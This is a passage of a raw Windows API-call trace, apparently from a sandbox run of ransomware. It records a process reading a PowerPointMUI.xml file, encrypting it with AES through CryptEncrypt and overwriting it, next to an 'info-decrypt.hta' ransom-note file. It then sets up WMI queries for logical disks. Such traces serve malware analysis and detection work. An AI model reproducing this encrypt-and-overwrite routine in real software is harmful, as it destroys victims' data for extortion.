lpBuffer=0x69dea34, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0210.210] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x69dea3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0210.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee9c) returned 1 [0210.210] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x69def18 | out: lpFileInformation=0x69def18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2005df20, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x2005df20, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x2005df20, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0210.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee98) returned 1 [0210.210] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x69de9b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0210.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dee64) returned 1 [0210.210] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x350b554 | out: lpFileInformation=0x350b554*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0210.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dee60) returned 1 [0210.211] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x69de8a4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0210.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded98) returned 1 [0210.211] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0210.211] GetFileType (hFile=0x348) returned 0x1 [0210.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded94) returned 1 [0210.211] GetFileType (hFile=0x348) returned 0x1 [0210.211] GetFileSize (in: hFile=0x348, lpFileSizeHigh=0x69deea0 | out: lpFileSizeHigh=0x69deea0*=0x0) returned 0x5aa [0210.425] ReadFile (in: hFile=0x348, lpBuffer=0x35d9b3c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x69dee4c, lpOverlapped=0x0 | out: lpBuffer=0x35d9b3c*, lpNumberOfBytesRead=0x69dee4c*=0x5aa, lpOverlapped=0x0) returned 1 [0211.663] CloseHandle (hObject=0x348) returned 1 [0211.938] CryptAcquireContextW (in: phProv=0x69dedec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x69dedec*=0x7a9a80) returned 1 [0211.940] CryptGenRandom (in: hProv=0x7a9a80, dwLen=0x10, pbBuffer=0x37996b4 | out: pbBuffer=0x37996b4) returned 1 [0212.580] CryptImportKey (in: hProv=0x7a9a80, pbData=0x34bb334, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x69dedbc | out: phKey=0x69dedbc*=0x77b470) returned 1 [0212.580] CryptContextAddRef (hProv=0x7a9a80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.580] CryptContextAddRef (hProv=0x7a9a80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.580] CryptDuplicateKey (in: hKey=0x77b470, pdwReserved=0x0, dwFlags=0x0, phKey=0x69dedac | out: phKey=0x69dedac*=0x77b0b0) returned 1 [0212.580] CryptContextAddRef (hProv=0x7a9a80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0212.580] CryptSetKeyParam (hKey=0x77b0b0, dwParam=0x4, pbData=0x34bb414*=0x1, dwFlags=0x0) returned 1 [0212.580] CryptSetKeyParam (hKey=0x77b0b0, dwParam=0x1, pbData=0x34bb3e0, dwFlags=0x0) returned 1 [0212.580] CryptEncrypt (in: hKey=0x77b0b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34bb424*, pdwDataLen=0x69dee18*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x34bb424*, pdwDataLen=0x69dee18*=0x5b0) returned 1 [0212.581] CryptEncrypt (in: hKey=0x77b0b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34bb9f8*, pdwDataLen=0x69dee20*=0x0, dwBufLen=0x10 | out: pbData=0x34bb9f8*, pdwDataLen=0x69dee20*=0x10) returned 1 [0212.582] CryptDestroyKey (hKey=0x77b470) returned 1 [0212.582] CryptReleaseContext (hProv=0x7a9a80, dwFlags=0x0) returned 1 [0212.582] CryptReleaseContext (hProv=0x7a9a80, dwFlags=0x0) returned 1 [0212.582] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", nBufferLength=0x105, lpBuffer=0x69de890, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpFilePart=0x0) returned 0x50 [0212.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded84) returned 1 [0212.582] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x378 [0212.583] GetFileType (hFile=0x378) returned 0x1 [0212.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded80) returned 1 [0212.583] GetFileType (hFile=0x378) returned 0x1 [0212.583] WriteFile (in: hFile=0x378, lpBuffer=0x34c0a84*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x69dee14, lpOverlapped=0x0 | out: lpBuffer=0x34c0a84*, lpNumberOfBytesWritten=0x69dee14*=0x7c0, lpOverlapped=0x0) returned 1 [0212.584] CloseHandle (hObject=0x378) returned 1 [0212.585] CoTaskMemAlloc (cb=0x20c) returned 0x7ade98 [0212.585] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7ade98 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0212.585] CoTaskMemFree (pv=0x7ade98) [0212.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x69de878, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0212.586] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69dedc0 | out: ppv=0x69dedc0*=0x72015c) returned 0x0 [0212.586] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69dedb8 | out: pAptType=0x69dedb8*=1) returned 0x0 [0212.586] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69dedbc | out: ppvObject=0x69dedbc*=0x0) returned 0x80004002 [0212.586] IUnknown:Release (This=0x72015c) returned 0x1 [0212.587] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de728 | out: ppv=0x69de728*=0x6736dd8) returned 0x0 [0212.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736dd8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de940 | out: ppvObject=0x69de940*=0x0) returned 0x80004002 [0212.587] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736dd8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de954 | out: ppvObject=0x69de954*=0x67384d0) returned 0x0 [0212.587] WbemDefPath:IUnknown:Release (This=0x6736dd8) returned 0x0 [0212.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de574 | out: ppvObject=0x69de574*=0x67384d0) returned 0x0 [0212.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de530 | out: ppvObject=0x69de530*=0x0) returned 0x80004002 [0212.588] WbemDefPath:IUnknown:AddRef (This=0x67384d0) returned 0x3 [0212.588] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dde8c | out: ppvObject=0x69dde8c*=0x0) returned 0x80004002 [0212.588] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69dde3c | out: ppvObject=0x69dde3c*=0x0) returned 0x80004002 [0212.588] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69dde48 | out: ppvObject=0x69dde48*=0x77dcd8) returned 0x0 [0212.588] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dcd8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69dde50 | out: pCid=0x69dde50*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.588] WbemDefPath:IUnknown:Release (This=0x77dcd8) returned 0x3 [0212.588] CoGetContextToken (in: pToken=0x69ddea8 | out: pToken=0x69ddea8) returned 0x0 [0212.588] CoGetContextToken (in: pToken=0x69de2b0 | out: pToken=0x69de2b0) returned 0x0 [0212.588] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de340 | out: ppvObject=0x69de340*=0x0) returned 0x80004002 [0212.588] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x2 [0212.588] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x1 [0212.588] CoGetContextToken (in: pToken=0x69dec38 | out: pToken=0x69dec38) returned 0x0 [0212.588] CoGetContextToken (in: pToken=0x69deb98 | out: pToken=0x69deb98) returned 0x0 [0212.588] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x69dec68*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69dec64 | out: ppvObject=0x69dec64*=0x67384d0) returned 0x0 [0212.588] WbemDefPath:IUnknown:AddRef (This=0x67384d0) returned 0x3 [0212.588] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x2 [0212.588] WbemDefPath:IWbemPath:SetText (This=0x67384d0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.588] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67384d0, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0212.588] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=2, puBuffLength=0x69dede8*=0x0, pszText=0x0 | out: puBuffLength=0x69dede8*=0x20, pszText=0x0) returned 0x0 [0212.588] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=2, puBuffLength=0x69dede8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0212.589] WbemDefPath:IWbemPath:GetInfo (in: This=0x67384d0, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0212.589] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67384d0, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0212.589] WbemDefPath:IWbemPath:GetInfo (in: This=0x67384d0, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0212.589] WbemDefPath:IWbemPath:GetInfo (in: This=0x67384d0, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0212.589] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67384d0, puCount=0x69ded6c | out: puCount=0x69ded6c*=0x0) returned 0x0 [0212.589] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x69ded58 | out: puCount=0x69ded58*=0x2) returned 0x0 [0212.589] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0x0, pszText=0x0 | out: puBuffLength=0x69ded54*=0xf, pszText=0x0) returned 0x0 [0212.589] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded54*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.589] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded08 | out: ppv=0x69ded08*=0x72015c) returned 0x0 [0212.589] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded00 | out: pAptType=0x69ded00*=1) returned 0x0 [0212.589] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded04 | out: ppvObject=0x69ded04*=0x0) returned 0x80004002 [0212.589] IUnknown:Release (This=0x72015c) returned 0x1 [0212.590] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de670 | out: ppv=0x69de670*=0x6736dc8) returned 0x0 [0212.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de888 | out: ppvObject=0x69de888*=0x0) returned 0x80004002 [0212.590] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736dc8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de89c | out: ppvObject=0x69de89c*=0x67382a0) returned 0x0 [0212.590] WbemDefPath:IUnknown:Release (This=0x6736dc8) returned 0x0 [0212.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4bc | out: ppvObject=0x69de4bc*=0x67382a0) returned 0x0 [0212.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de478 | out: ppvObject=0x69de478*=0x0) returned 0x80004002 [0212.590] WbemDefPath:IUnknown:AddRef (This=0x67382a0) returned 0x3 [0212.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dddd4 | out: ppvObject=0x69dddd4*=0x0) returned 0x80004002 [0212.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddd84 | out: ppvObject=0x69ddd84*=0x0) returned 0x80004002 [0212.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddd90 | out: ppvObject=0x69ddd90*=0x77db78) returned 0x0 [0212.590] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77db78, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddd98 | out: pCid=0x69ddd98*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.590] WbemDefPath:IUnknown:Release (This=0x77db78) returned 0x3 [0212.590] CoGetContextToken (in: pToken=0x69dddf0 | out: pToken=0x69dddf0) returned 0x0 [0212.590] CoGetContextToken (in: pToken=0x69de1f8 | out: pToken=0x69de1f8) returned 0x0 [0212.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de288 | out: ppvObject=0x69de288*=0x0) returned 0x80004002 [0212.591] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x2 [0212.591] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x1 [0212.591] CoGetContextToken (in: pToken=0x69deb80 | out: pToken=0x69deb80) returned 0x0 [0212.591] CoGetContextToken (in: pToken=0x69deae0 | out: pToken=0x69deae0) returned 0x0 [0212.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x69debb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69debac | out: ppvObject=0x69debac*=0x67382a0) returned 0x0 [0212.591] WbemDefPath:IUnknown:AddRef (This=0x67382a0) returned 0x3 [0212.591] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x2 [0212.591] WbemDefPath:IWbemPath:SetText (This=0x67382a0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0212.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67382a0, puCount=0x69ded30 | out: puCount=0x69ded30*=0x2) returned 0x0 [0212.591] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=4, puBuffLength=0x69ded2c*=0x0, pszText=0x0 | out: puBuffLength=0x69ded2c*=0xf, pszText=0x0) returned 0x0 [0212.591] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=4, puBuffLength=0x69ded2c*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded2c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.591] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded30 | out: ppv=0x69ded30*=0x72015c) returned 0x0 [0212.591] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded28 | out: pAptType=0x69ded28*=1) returned 0x0 [0212.591] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded2c | out: ppvObject=0x69ded2c*=0x0) returned 0x80004002 [0212.591] IUnknown:Release (This=0x72015c) returned 0x1 [0212.592] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de950 | out: ppv=0x69de950*=0x673d288) returned 0x0 [0212.592] WbemLocator:IUnknown:QueryInterface (in: This=0x673d288, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69deb68 | out: ppvObject=0x69deb68*=0x0) returned 0x80004002 [0212.592] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d288, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb7c | out: ppvObject=0x69deb7c*=0x6737128) returned 0x0 [0212.592] WbemLocator:IUnknown:Release (This=0x673d288) returned 0x0 [0212.592] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de79c | out: ppvObject=0x69de79c*=0x6737128) returned 0x0 [0212.592] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de758 | out: ppvObject=0x69de758*=0x0) returned 0x80004002 [0212.592] WbemLocator:IUnknown:AddRef (This=0x6737128) returned 0x3 [0212.592] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de0b4 | out: ppvObject=0x69de0b4*=0x0) returned 0x80004002 [0212.592] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69de064 | out: ppvObject=0x69de064*=0x0) returned 0x80004002 [0212.592] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de070 | out: ppvObject=0x69de070*=0x0) returned 0x80004002 [0212.592] CoGetContextToken (in: pToken=0x69de0d0 | out: pToken=0x69de0d0) returned 0x0 [0212.592] CoGetContextToken (in: pToken=0x69de4d8 | out: pToken=0x69de4d8) returned 0x0 [0212.592] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de568 | out: 